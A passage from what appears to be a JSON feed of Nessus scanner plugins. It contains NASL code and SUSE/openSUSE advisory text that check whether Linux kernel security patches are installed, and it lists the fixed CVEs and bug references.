script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.55-52_45 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980856\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980883\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-7446/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0758/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2053/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4470/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4565/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162001-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6681f52b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1172=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1172=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_45-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_45-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_55-52_45-default-2-2.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_55-52_45-xen-2-2.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:30:39", "description": "The openSUSE Leap 42.1 kernel was updated to 4.1.26 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2016-1583: Prevent the usage of mmap when the lower\n file system does not allow it. This could have lead to\n local privilege escalation when ecryptfs-utils was\n installed and /sbin/mount.ecryptfs_private was setuid\n (bsc#983143).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relies on the write system\n call, which allows local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface.\n (bsc#979548)\n\n - CVE-2016-4805: Use-after-free vulnerability in\n drivers/net/ppp/ppp_generic.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash, or spinlock) or possibly\n have unspecified other impact by removing a network\n namespace, related to the ppp_register_net_channel and\n ppp_unregister_channel functions. (bsc#980371).\n\n - CVE-2016-4951: The tipc_nl_publ_dump function in\n net/tipc/socket.c in the Linux kernel did not verify\n socket existence, which allowed local users to cause a\n denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a\n dumpit operation. (bsc#981058).\n\n - CVE-2016-5244: An information leak vulnerability in\n function rds_inc_info_copy of file net/rds/recv.c was\n fixed that might have leaked kernel stack data.\n (bsc#983213).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in\n net/x25/x25_facilities.c in the Linux kernel did not\n properly initialize a certain data structure, which\n allowed attackers to obtain sensitive information from\n kernel stack memory via an X.25 Call Request.\n (bsc#981267).\n\n - CVE-2016-0758: Tags with indefinite length could have\n corrupted pointers in asn1_find_indefinite_length\n (bsc#979867).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bnc#955654).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-3672: The arch_pick_mmap_layout function in\n arch/x86/mm/mmap.c in the Linux kernel did not properly\n randomize the legacy base address, which made it easier\n for local users to defeat the intended restrictions on\n the ADDR_NO_RANDOMIZE flag, and bypass the ASLR\n protection mechanism for a setuid or setgid program, by\n disabling stack-consumption resource limits\n (bnc#974308).\n\n - CVE-2016-4482: A kernel information leak in the usbfs\n devio connectinfo was fixed, which could expose kernel\n stack memory to userspace. (bnc#978401).\n\n - CVE-2016-4485: A kernel information leak in llc was\n fixed (bsc#978821).\n\n - CVE-2016-4486: A kernel information leak in rtnetlink\n was fixed, where 4 uninitialized bytes could leak to\n userspace (bsc#978822).\n\n - CVE-2016-4557: A use-after-free via double-fdput in\n replace_map_fd_with_map_ptr() was fixed, which could\n allow privilege escalation (bsc#979018).\n\n - CVE-2016-4565: When the 'rdma_ucm' infiniband module is\n loaded, local attackers could escalate their privileges\n (bsc#979548).\n\n - CVE-2016-4569: A kernel information leak in the ALSA\n timer via events via snd_timer_user_tinterrupt that\n could leak information to userspace was fixed\n (bsc#979213).\n\n - CVE-2016-4578: A kernel information leak in the ALSA\n timer via events that could leak information to\n userspace was fixed (bsc#979879).\n\n - CVE-2016-4581: If the first propogated mount copy was\n being a slave it could oops the kernel (bsc#979913)\n\nThe following non-security bugs were fixed :\n\n - ALSA: hda - Add dock support for ThinkPad X260\n (boo#979278).\n\n - ALSA: hda - Apply fix for white noise on Asus N550JV,\n too (boo#979278).\n\n - ALSA: hda - Asus N750JV external subwoofer fixup\n (boo#979278).\n\n - ALSA: hda - Fix broken reconfig (boo#979278).\n\n - ALSA: hda - Fix headphone mic input on a few Dell ALC293\n machines (boo#979278).\n\n - ALSA: hda - Fix subwoofer pin on ASUS N751 and N551\n (boo#979278).\n\n - ALSA: hda - Fix white noise on Asus N750JV headphone\n (boo#979278).\n\n - ALSA: hda - Fix white noise on Asus UX501VW headset\n (boo#979278).\n\n - ALSA: hda/realtek - Add ALC3234 headset mode for\n Optiplex 9020m (boo#979278).\n\n - ALSA: hda/realtek - New codecs support for\n ALC234/ALC274/ALC294 (boo#979278).\n\n - ALSA: hda/realtek - New codec support of ALC225\n (boo#979278).\n\n - ALSA: hda/realtek - Support headset mode for ALC225\n (boo#979278).\n\n - ALSA: pcxhr: Fix missing mutex unlock (boo#979278).\n\n - ALSA: usb-audio: Quirk for yet another Phoenix Audio\n devices (v2) (boo#979278).\n\n - bluetooth: fix power_on vs close race (bsc#966849).\n\n - bluetooth: vhci: fix open_timeout vs. hdev race\n (bsc#971799,bsc#966849).\n\n - bluetooth: vhci: Fix race at creating hci device\n (bsc#971799,bsc#966849).\n\n - bluetooth: vhci: purge unhandled skbs\n (bsc#971799,bsc#966849).\n\n - btrfs: do not use src fd for printk (bsc#980348).\n\n - btrfs: fix crash/invalid memory access on fsync when\n using overlayfs (bsc#977198)\n\n - drm: qxl: Workaround for buggy user-space (bsc#981344).\n\n - enic: set netdev->vlan_features (bsc#966245).\n\n - fs: add file_dentry() (bsc#977198).\n\n - IB/IPoIB: Do not set skb truesize since using one\n linearskb (bsc#980657).\n\n - input: i8042 - lower log level for 'no controller'\n message (bsc#945345).\n\n - kabi: Add kabi/severities entries to ignore sound/hda/*,\n x509_*, efivar_validate, file_open_root and dax_fault\n\n - kabi: Add some fixups (module, pci_dev, drm, fuse and\n thermal)\n\n - kabi: file_dentry changes (bsc#977198).\n\n - kABI fixes for 4.1.22\n\n - mm/page_alloc.c: calculate 'available' memory in a\n separate function (bsc#982239).\n\n - net: disable fragment reassembly if high_thresh is zero\n (bsc#970506).\n\n - of: iommu: Silence misleading warning.\n\n - pstore_register() error handling was wrong -- it tried\n to release lock before it's acquired, causing spinlock /\n preemption imbalance. - usb: quirk to stop runtime PM\n for Intel 7260 (bnc#984460).\n\n - Revert 'usb: hub: do not clear BOS field during reset\n device' (boo#979728).\n\n - usb: core: hub: hub_port_init lock controller instead of\n bus (bnc#978073).\n\n - usb: preserve kABI in address0 locking (bnc#978073).\n\n - usb: usbip: fix potential out-of-bounds write\n (bnc#975945).\n\n - USB: xhci: Add broken streams quirk for Frescologic\n device id 1009 (bnc#982712).\n\n - virtio_balloon: do not change memory amount visible via\n /proc/meminfo (bsc#982238).\n\n - virtio_balloon: export 'available' memory to balloon\n statistics (bsc#982239).", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-22T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2016-753)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5244", "CVE-2016-4581", "CVE-2016-2053", "CVE-2016-4557", "CVE-2016-4951", "CVE-2016-4486", "CVE-2016-1583", "CVE-2016-0758", "CVE-2016-4569", "CVE-2016-3955", "CVE-2016-4485", "CVE-2016-4482", "CVE-2016-4578", "CVE-2016-4805", "CVE-2013-7446", "CVE-2016-4565", "CVE-2016-4580", "CVE-2016-3672", "CVE-2016-3134"], "modified": "2016-06-22T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:kernel-obs-qa-xen", "p-cpe:/a:novell:opensuse:kernel-pv-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:kernel-pv-devel", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pv", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-docs-html", "p-cpe:/a:novell:opensuse:kernel-obs-qa", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-docs-pdf", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-pv-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pv-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-pv-base", "p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-obs-build", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo"], "id": "OPENSUSE-2016-753.NASL", "href": "https://www.tenable.com/plugins/nessus/91736", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-753.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91736);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-3134\", \"CVE-2016-3672\", \"CVE-2016-3955\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4486\", \"CVE-2016-4557\", \"CVE-2016-4565\", \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4580\", \"CVE-2016-4581\", \"CVE-2016-4805\", \"CVE-2016-4951\", \"CVE-2016-5244\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2016-753)\");\n script_summary(english:\"Check for the openSUSE-2016-753 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.1 kernel was updated to 4.1.26 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2016-1583: Prevent the usage of mmap when the lower\n file system does not allow it. This could have lead to\n local privilege escalation when ecryptfs-utils was\n installed and /sbin/mount.ecryptfs_private was setuid\n (bsc#983143).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relies on the write system\n call, which allows local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface.\n (bsc#979548)\n\n - CVE-2016-4805: Use-after-free vulnerability in\n drivers/net/ppp/ppp_generic.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash, or spinlock) or possibly\n have unspecified other impact by removing a network\n namespace, related to the ppp_register_net_channel and\n ppp_unregister_channel functions. (bsc#980371).\n\n - CVE-2016-4951: The tipc_nl_publ_dump function in\n net/tipc/socket.c in the Linux kernel did not verify\n socket existence, which allowed local users to cause a\n denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a\n dumpit operation. (bsc#981058).\n\n - CVE-2016-5244: An information leak vulnerability in\n function rds_inc_info_copy of file net/rds/recv.c was\n fixed that might have leaked kernel stack data.\n (bsc#983213).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in\n net/x25/x25_facilities.c in the Linux kernel did not\n properly initialize a certain data structure, which\n allowed attackers to obtain sensitive information from\n kernel stack memory via an X.25 Call Request.\n (bsc#981267).\n\n - CVE-2016-0758: Tags with indefinite length could have\n corrupted pointers in asn1_find_indefinite_length\n (bsc#979867).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bnc#955654).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-3672: The arch_pick_mmap_layout function in\n arch/x86/mm/mmap.c in the Linux kernel did not properly\n randomize the legacy base address, which made it easier\n for local users to defeat the intended restrictions on\n the ADDR_NO_RANDOMIZE flag, and bypass the ASLR\n protection mechanism for a setuid or setgid program, by\n disabling stack-consumption resource limits\n (bnc#974308).\n\n - CVE-2016-4482: A kernel information leak in the usbfs\n devio connectinfo was fixed, which could expose kernel\n stack memory to userspace. (bnc#978401).\n\n - CVE-2016-4485: A kernel information leak in llc was\n fixed (bsc#978821).\n\n - CVE-2016-4486: A kernel information leak in rtnetlink\n was fixed, where 4 uninitialized bytes could leak to\n userspace (bsc#978822).\n\n - CVE-2016-4557: A use-after-free via double-fdput in\n replace_map_fd_with_map_ptr() was fixed, which could\n allow privilege escalation (bsc#979018).\n\n - CVE-2016-4565: When the 'rdma_ucm' infiniband module is\n loaded, local attackers could escalate their privileges\n (bsc#979548).\n\n - CVE-2016-4569: A kernel information leak in the ALSA\n timer via events via snd_timer_user_tinterrupt that\n could leak information to userspace was fixed\n (bsc#979213).\n\n - CVE-2016-4578: A kernel information leak in the ALSA\n timer via events that could leak information to\n userspace was fixed (bsc#979879).\n\n - CVE-2016-4581: If the first propogated mount copy was\n being a slave it could oops the kernel (bsc#979913)\n\nThe following non-security bugs were fixed :\n\n - ALSA: hda - Add dock support for ThinkPad X260\n (boo#979278).\n\n - ALSA: hda - Apply fix for white noise on Asus N550JV,\n too (boo#979278).\n\n - ALSA: hda - Asus N750JV external subwoofer fixup\n (boo#979278).\n\n - ALSA: hda - Fix broken reconfig (boo#979278).\n\n - ALSA: hda - Fix headphone mic input on a few Dell ALC293\n machines (boo#979278).\n\n - ALSA: hda - Fix subwoofer pin on ASUS N751 and N551\n (boo#979278).\n\n - ALSA: hda - Fix white noise on Asus N750JV headphone\n (boo#979278).\n\n - ALSA: hda - Fix white noise on Asus UX501VW headset\n (boo#979278).\n\n - ALSA: hda/realtek - Add ALC3234 headset mode for\n Optiplex 9020m (boo#979278).\n\n - ALSA: hda/realtek - New codecs support for\n ALC234/ALC274/ALC294 (boo#979278).\n\n - ALSA: hda/realtek - New codec support of ALC225\n (boo#979278).\n\n - ALSA: hda/realtek - Support headset mode for ALC225\n (boo#979278).\n\n - ALSA: pcxhr: Fix missing mutex unlock (boo#979278).\n\n - ALSA: usb-audio: Quirk for yet another Phoenix Audio\n devices (v2) (boo#979278).\n\n - bluetooth: fix power_on vs close race (bsc#966849).\n\n - bluetooth: vhci: fix open_timeout vs. hdev race\n (bsc#971799,bsc#966849).\n\n - bluetooth: vhci: Fix race at creating hci device\n (bsc#971799,bsc#966849).\n\n - bluetooth: vhci: purge unhandled skbs\n (bsc#971799,bsc#966849).\n\n - btrfs: do not use src fd for printk (bsc#980348).\n\n - btrfs: fix crash/invalid memory access on fsync when\n using overlayfs (bsc#977198)\n\n - drm: qxl: Workaround for buggy user-space (bsc#981344).\n\n - enic: set netdev->vlan_features (bsc#966245).\n\n - fs: add file_dentry() (bsc#977198).\n\n - IB/IPoIB: Do not set skb truesize since using one\n linearskb (bsc#980657).\n\n - input: i8042 - lower log level for 'no controller'\n message (bsc#945345).\n\n - kabi: Add kabi/severities entries to ignore sound/hda/*,\n x509_*, efivar_validate, file_open_root and dax_fault\n\n - kabi: Add some fixups (module, pci_dev, drm, fuse and\n thermal)\n\n - kabi: file_dentry changes (bsc#977198).\n\n - kABI fixes for 4.1.22\n\n - mm/page_alloc.c: calculate 'available' memory in a\n separate function (bsc#982239).\n\n - net: disable fragment reassembly if high_thresh is zero\n (bsc#970506).\n\n - of: iommu: Silence misleading warning.\n\n - pstore_register() error handling was wrong -- it tried\n to release lock before it's acquired, causing spinlock /\n preemption imbalance. - usb: quirk to stop runtime PM\n for Intel 7260 (bnc#984460).\n\n - Revert 'usb: hub: do not clear BOS field during reset\n device' (boo#979728).\n\n - usb: core: hub: hub_port_init lock controller instead of\n bus (bnc#978073).\n\n - usb: preserve kABI in address0 locking (bnc#978073).\n\n - usb: usbip: fix potential out-of-bounds write\n (bnc#975945).\n\n - USB: xhci: Add broken streams quirk for Frescologic\n device id 1009 (bnc#982712).\n\n - virtio_balloon: do not change memory amount visible via\n /proc/meminfo (bsc#982238).\n\n - virtio_balloon: export 'available' memory to balloon\n statistics (bsc#982239).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=955654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971799\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974308\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=975945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=977198\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978073\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979548\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979728\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 